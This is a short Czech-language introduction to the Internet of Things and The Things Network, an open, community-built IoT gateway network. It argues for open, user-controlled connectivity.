Většina lidí resp. jejich pracovních stanic, mobilů, dalších osobních zařízení a větších počítačů už je připojena k internetu. Současným trendem (už pár let) je připojování „věcí“ k internetu tzv. IoT. Věcmi jsou buď různá čidla, která posílají naměřené hodnoty do sítě, nebo akční členy, které na základě přijatých zpráv něco dělají, případně kombinovaná zařízení, která přijímají i odesílají zprávy zároveň.

The Things Network - IoT brána

Časem bude možná nějakou formou konektivity vybavené každé zařízení. Může se vám to nelíbit, můžete s tím nesouhlasit, ale… znáte to. Úspěšnou strategií je zajistit, aby použité technologie byly otevřené nikoli proprietární, aby síť patřila nám, abychom to byli my, kdo má vliv na její fungování, abychom dostupnou konektivitu používali tam, kde to má smysl, a v ostatních případech ji mohli vypnout nebo odstranit. V současné době se rozšiřuje IoT síť, která stojí na otevřených principech a na které se může podílet každý z nás.